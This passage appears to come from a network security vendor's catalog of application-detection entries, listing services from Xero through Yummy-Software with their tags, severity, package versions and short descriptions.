About this situation: Xero usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Xero develops cloud-based accounting software for small and medium-sized businesses.
Back to top

Xeround

About this situation: Application Xeround detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: As a major international trade promoter in China, xeround.com provides global buyers with quality information on suppliers and products, and global suppliers with a full package of promotion services. xeround.com is open to all the companies looking for global business. It allows members to directly manage their online product catalogs composed of up-to-date product information.
Back to top

Xerox-Cloud-Services

About this situation: Application Xerox-Cloud-Services detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xerox- is cloud service has the potential to transform the production workflow market, streamlining software solution distribution, deployment, and management.
Back to top

Xetex-Xebra

About this situation: Application Xetex-Xebra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xetex Xebra produces and supports business management software specialized for distributors of print and promotional products.
Back to top

Xfinity-TV

About this situation: Xfinity TV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: XFINITY TV (formerly Fancast) allows users to watch streaming web video.
Back to top

Xfire

About this situation: Xfire usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Social Networking
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-628-5211
Description: Xfire is an instant messaging service targeted at gamers.
Back to top

Xhamster

About this situation: Xhamster usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1639-5242
Description: Xhamster is an adult video streaming service.
Back to top

Xignite

About this situation: Application Xignite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xignite, Inc. provides cloud-based financial market data APIs to help emerging companies and established enterprises deliver real-time and reference market data to their digital assets, such as websites and apps.
Back to top

Xilnex-Retail-Business-Solution

About this situation: Application Xilnex-Retail-Business-Solution detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Either you are running a single home-based retail store or a chain of retail outlets, you will definitely appreciate Xilnex's Software
Back to top

Xing

About this situation: XING usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

XING-Events

About this situation: Application XING-Events detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: XING Events offers SaaS based event registration and ticketing services for business and entertainment events.
Back to top

Xinhuanet

About this situation: Xinhuanet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Description: Xinhuanet is a Chinese news site.
Back to top

XKCD

About this situation: XKCD usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-708-5211
Description: XKCD is a popular web comic
Back to top

XM-online+

About this situation: XM online+ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-628-5211
Description: XM online+ is a satellite radio service (SDARS) in Canada.
Back to top

Xmarks

About this situation: Application Xmarks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xmarks is a service that produces an add-on to web browsers.
Back to top

xMatters

About this situation: Application xMatters detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: xMatters clients use our communication platform for mass notification and IT alerting to ensure business continuity, coordinate recovery efforts, in crisis management and to resolve IT incidents.
Back to top

Xname.org

About this situation: Application Xname.org detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xname.org - DNS hosting service is provided to help people that don't want to lose time and money with providers not always reactive to DNS changes.
Back to top

XO-Communications-Business-Center

About this situation: Application XO-Communications-Business-Center detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: XO Communications is provider of advanced IP communications, managed network and IT infrastructure services for business, large enterprise and wholesale customers. Business Center - self-service portal where you can pay invoices, open trouble tickets.
Back to top

Xobni

About this situation: Application Xobni detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xobni creates complete and searchable social profiles of a user's contacts that include updates from LinkedIn, Facebook, and Twitter.
Back to top

Xpenditure

About this situation: Application Xpenditure detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xpenditure offers an expense management solution that fits the needs of entrepreneurs, growing teams and enterprises
Back to top

XPlace

About this situation: Application XPlace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: XPlace is an online freelance project marketplace that connects you with professionals, experts and freelancers easily and efficiently for any project or job.
Back to top

Xpressdocs

About this situation: Xpressdocs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Xpressdocs was created to help real estate professionals produce high-quality marketing materials in an efficient, economical, and timely manner.It provides professionally designed postcard templates and business cards to brand-building brochures and flyers.
Back to top

xRP

About this situation: Application xRP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: xRP is an online CRM/ERP Solution.
Back to top

XSellco

About this situation: Application XSellco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: XSellco builds innovative products that allow eCommerce businesses.
Back to top

xTuple

About this situation: Application xTuple detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: xTuple open source ERP is business software for small to medium-sized businesses (SMBs).
Back to top

Xvideos

About this situation: Xvideos usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1639-5242
Description: Xvideos is an adult video streaming service.
Back to top

Xxxoh

About this situation: Xxxoh usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1706-5242
Description: Xxxoh is an adult media distribution service.
Back to top

Xyea

About this situation: Application Xyea detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Xyea - software solution that enables organizations to manage risk and compliance obligations
Back to top

Xymon

About this situation: Xymon System Monitor usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-660-5211
Description: Xymon System Monitor is a free remote system monitoring utility.
Back to top

Yahoo

About this situation: Yahoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1725-5242
Description: Yahoo web services include for example a web portal, search engine, email and advertising.
Back to top

Yahoo!-Blog-Posting

About this situation: Yahoo! Blog Posting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1725-5242
Description: Yahoo!-Blog-Posting.com is a social networking, user review, and local search web site.
Back to top

Yahoo-Blogs

About this situation: Yahoo Blogs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Yahoo! Blogs are various blog-posting sites provided by Yahoo!
Back to top

Yahoo-Buzz

About this situation: Yahoo Buzz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This site is a global community based service that combines the features of social bookmarking and syndication. Users can publish their own news stories, or link to the site that provides information on the news stories. This drives the traffic to various websites and creates a large market for sites that research and publish their own news articles and stories. Source: Wikipedia
Back to top

Yahoo-Calendar

About this situation: Yahoo Calendar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1725-5242
Description: Yahoo Calendar is a web application that help users to organize and manage personal, organizational and public events. It also let users to organize and manage their personal tasks and set reminders.
Back to top

Yahoo-Days

About this situation: Yahoo Days usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese social networking service that allows users to share photos, messages, and videos.
Back to top

Yahoo-Douga

About this situation: Yahoo Douga usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: A video sharing website
Back to top

Yahoo-Finance

About this situation: Yahoo Finance usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-773-5211
Description: Yahoo! Finance is a web-based service that provides financial news and stock information.
Back to top

Yahoo-Games

About this situation: Yahoo Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-773-5211
Description: Yahoo Games is a section of Yahoo website.
Back to top

Yahoo-Groups

About this situation: Yahoo Groups usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a global social networking service, that allows users to create and join groups of interest. Yahoo Groups are designed to help users meet people with shared interests, and to access photos, shared message archives, group event calendars, member polls.
Back to top

Yahoo-Music

About this situation: Yahoo Music usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: This site is a global music sharing service, that allows users to share music videos, news, artist information, and original programming. Users with Yahoo accounts can access music based on artist, album, song and genre preferences. Source: Wikipedia
Back to top

Yahoo-Notepad

About this situation: Yahoo Notepad usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-773-5211
Description: Yahoo! Notepad is a web-based application service that allow users to write down and organize notes online.
Back to top

Yahoo-Pulse

About this situation: Yahoo Pulse usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a global social networking service, that allows users to share photos, messages, and videos.
Back to top

Yahoo-RightMedia

About this situation: Yahoo RightMedia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-630-5211
Description: Yahoo RightMedia is an online advertising service.
Back to top

Yahoo-Sports

About this situation: Yahoo Sports usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a global sports based portal, that provides the latest sports news, scores, fantasy games, and other related information.
Back to top

Yahoo-Toolbar

About this situation: Yahoo Toolbar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1238-5242
Description: Yahoo! Toolbar usage detected. Yahoo! Toolbar is a toolbar that installs on the Internet Explorer and Firefox browsers, within the context of Internet access functions. It allows access to several functions, including Yahoo! Search and Yahoo! Mail. It also contains built-in algorithms to prevent pop-ups.
Back to top

Yahoo-Web-Mail

About this situation: Yahoo Web Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1725-5242
Description: Yahoo Mail is a free webmail service operated by Yahoo Inc. The service can be accessed using web browser at site mail.yahoo.com.
Back to top

Yahoo-Web-Messenger

About this situation: Yahoo Web Messenger usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-773-5211
Description: Yahoo Web Messenger is the web version of Yahoo's instant messaging service. Yahoo Web Messenger is integrated within Yahoo Web Mail service. The service can be accessed using a web browser at the site: http://mail.yahoo.com.
Back to top

Yammer

About this situation: Yammer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is used to communicate privately within organizations or between organizational members and pre-designated groups. Source: Wikipedia
Back to top

Yandex

About this situation: Yandex usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-628-5211
Description: Yandex is a Russian Internet company which operates the largest search engine in Russia.
Back to top

Yandex-Disk

About this situation: Application Yandex-Disk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yandex Disk is a cloud service that helps to store files on cloud servers and share them with others.
Back to top

Yandex-Mail

About this situation: Yandex Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-768-5211
Description: Yandex Mail is a free Russian webmail service.
Back to top

Yanomo

About this situation: Application Yanomo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yanomo is a multilingual, industrial-strength time, expense invoice tracking tool.
Back to top

Yapchat

About this situation: YapChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Yaplog!

About this situation: Yaplog! usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

Yardi-Systems

About this situation: Application Yardi-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yardi offers end-to-end property and investment management software and services.
Back to top

Yealink

About this situation: Yealink usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1787-5242
Last changed: sgpkg-ips-1792-5242
Description: Yealink provides a distributed cloud-based video conferencing infrastructure tailored for HD video conferencing collaboration in the modern workplace. To allow access for Yealink the following items should be allowed in the Engine Policy. QUIC on ANY service port, STUN on ANY service port, and both a new custom TCP and UDP service which allows destination ports 9701 through 9736.
Back to top

Yellowfin-Analytics

About this situation: Application Yellowfin-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yellowfin provides web-based embeddable reporting and analytics. Through an SOA Yellowfin can be integrated into any application delivering ease of use and real-time data analysis, through ad-hoc reporting and real-time dashboards, to business users that need to make rapid decisions.
Back to top

Yelp

About this situation: Yelp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-630-5211
Description: Yelp.com is a social networking, user review, and local search web site.
Back to top

Yendo

About this situation: Yendo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Yendo is Financial accounting software for small business. It has invoicing, purchases, expenses and payments. Full accounting reports including Debtors, Profit and Loss and Balance Sheet.
Back to top

Yesware

About this situation: Application Yesware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yesware is a prescriptive platform for sales teams. Track emails, create templates, CRM sync, and more.
Back to top

Ylastic

About this situation: Application Ylastic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ylastic is a bootstrapped company building the next generation tools for managing AWS and other cloudenvironments.
Back to top

YLE

About this situation: Finnish Broadcast Company (YLE) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1086-5242
Description: YLE is Finnish public radio and television service.
Back to top

YLE-Areena

About this situation: YLE Areena usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1638-5242
Description: Yle Areena is a Finnish online radio and tv program service.
Back to top

YLE-Lapset

About this situation: YLE Lapset usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1638-5242
Description: YLE Lapset is a mobile entertainment appliction targeted for childrens.
Back to top

Yo!Kart

About this situation: Application Yo!Kart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yo
Back to top

Yodiz

About this situation: Application Yodiz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yodiz is online Agile Scrum Management tool, consisting of Product Backlog Management, Kanban Scrum Board, Issue Tracking Software, Team Discussions and Git/SVN Integrations. It also has Live Group chat that let's your team stay connected all the time.
Back to top

Yodle

About this situation: Application Yodle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yodle helps to build a company's web presence by offering a platform that includes a comprehensive desktop and mobile web presence, SEO techniques, optimized online media buys, consistent distribution to online directories, relationship marketing, display advertising, reputation monitoring tools, and performance dashboard.
Back to top

Yodlee

About this situation: Application Yodlee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yodlee transforms data and insights into scalable personal financial management solutions for banks, entrepreneurs and the people they serve.
Back to top

Yodlee-Money-Center

About this situation: Application Yodlee-Money-Center detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yodlee Money Center provides digital financial management products to banks and financial institutions.
Back to top

Yola

About this situation: Application Yola detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yola is a SaaS provider of website services focused on helping small and medium-sized businesses build and grow their online presence.
Back to top

Yonyx-Interactive-Guides

About this situation: Application Yonyx-Interactive-Guides detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yonyx Decision Network Architecture (DNA) makes creating multimedia interactive self service content a breeze.
Back to top

Yoolink

About this situation: Application Yoolink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: YoolinkPro is a customizable social network solution that allows you to create your corporate social network or easily animate a community.
Back to top

Yoomit

About this situation: Application Yoomit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Yoomit is Online organizer connected to Google Calendar
Back to top

Youcalc

About this situation: Application Youcalc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Youcalc is a user-driven library of analytics apps for CRM, sales, marketing, support, and project management.
Back to top

Youdecide

About this situation: Application Youdecide detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: YouDecide- an employee voluntary benefits and discount program for personal insurance and loans and group-discounted products and services.
Back to top

Youjizz

About this situation: Youjizz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-628-5211
Description: Youjizz is an adult video streaming service.
Back to top

Youku

About this situation: Youku usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-932-5242
Description: Youku (www.youku.com) is a video sharing website based on the flash technology. Unregistered users can browse, play, comment on published video clips. Registered users can publish video clips to the website.
Back to top

Younicycle

About this situation: Application Younicycle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Younicycle is an integrated, comprehensive and collaborative Web Manager System. Include Clod Manager, Data Manager, Content Manager, Print Manager.
Back to top

Younility

About this situation: Application Younility detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Younility offers a mobile platform for businesses to intelligently communicate, capture and store information
Back to top

Younited

About this situation: Younited usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1764-5242
Description: Younited is a universal cloud-storage service provided by Finnish security firm F-Secure.
Back to top

YouNoodle

About this situation: Application YouNoodle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: YouNoodle helps startup founders get advice, prizes, and opportunities from our network of startup competitions.
Back to top

Your-BitTorrent

About this situation: your bittorrent usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Your-Freedom

About this situation: Your-Freedom usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-1086-5242
Description: Your-Freedom is an tunneling tool for bypassing firewalls and proxies and anonymising connections.
Back to top

YourEcommerce

About this situation: Application YourEcommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: YourEcommerce is a company that provides shopping cart software.
Back to top

Yourfilehost

About this situation: Yourfilehost usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-595-5211
Description: Yourfilehost is a free file hosting and sharing service.
Back to top

Youseemore

About this situation: YouSeeMore usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a TLC web-based library service where users can search and retrieve catalog information.
Back to top

YouSendit

About this situation: YouSendit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-628-5211
Description: YouSendIt is an online file sharing software that allows users to easily send large files and email attachments.
Back to top

YouTube

About this situation: YouTube usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1644-5242
Description: YouTube is a video sharing website on which users can upload and share videos. To allow Youtube usage, you will also need to allow the applications Google, Google-DoubleClick, Google-Accounts and Google-Hosted-Libraries.
Back to top

YouTube Commenting

About this situation: YouTube function that enables a user to comment, like or dislike.
Context: URL Application Context
Severity: 1
Tags: Social Web - YouTube, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: YouTube function that enables a user to comment, like or dislike.
Back to top

Youtube Moderate Resolve

About this situation: This defines a resolve rule used when Youtube moderate mode is enforced.
Context: DNS Host Resolution
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a rewriting rule used when Youtube moderate mode is enforced.
Back to top

Youtube Moderate Rewrite

About this situation: This defines a rewrite rule used when Youtube moderate mode is enforced.
Context: DNS Host Rewriting
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a rewriting rule used when Youtube moderate mode is enforced.
Back to top

YouTube Sharing

About this situation: YouTube function that enables a user to share a video within and outside of the YouTube community.
Context: URL Application Context
Severity: 1
Tags: Social Web - YouTube, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: YouTube function that enables a user to share a video within and outside of the YouTube community.
Back to top

Youtube Strict Resolve

About this situation: This defines a resolve rule used when Youtube strict mode is enforced.
Context: DNS Host Resolution
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a resolution rule used when Youtube strict mode is enforced.
Back to top

Youtube Strict Rewrite

About this situation: This defines a rewrite rule used when Youtube strict mode is enforced.
Context: DNS Host Rewriting
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a rewrite rule used when Youtube strict mode is enforced.
Back to top

YouTube Video Upload

About this situation: YouTube function that enables a user to upload a video.
Context: URL Application Context
Severity: 1
Tags: Social Web - YouTube, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: YouTube function that enables a user to upload a video.
Back to top

Ypserv

About this situation: ypserv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Network Information Service (NIS) is a service that provides configuration information to all machines on the network. The information is typically hostnames, login names, passwords, home directories and group information. ypserv is the server daemon used to distribute NIS database information to clients.
Back to top

YuDu-Global

About this situation: Application YuDu-Global detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: YuDoMail is an enterprise-grade, email productivity tool that allows users to increase their productivity.
Back to top

Yugma

About this situation: Yugma usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This application provides desktop sharing and collaboration, online meeting, and web conferencing.
Back to top

Yum-Update

About this situation: yum Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-625-5211
Description: An open-source command-line package-management utility for RPM-compatible Linux operating systems; source Wikipedia
Back to top

YuMe

About this situation: Application YuMe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: YuMe, Inc. is a provider of digital video brand advertising solutions.
Back to top

Yuml

About this situation: Application Yuml detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Yuml is a software platform which allows to create and share simple UML diagrams in blogs, wikis, forums, bug-trackers and emails.
Back to top

Yummy-Software

About this situation: Application Yummy-Software detected
Context: Application Context
Severity: 1
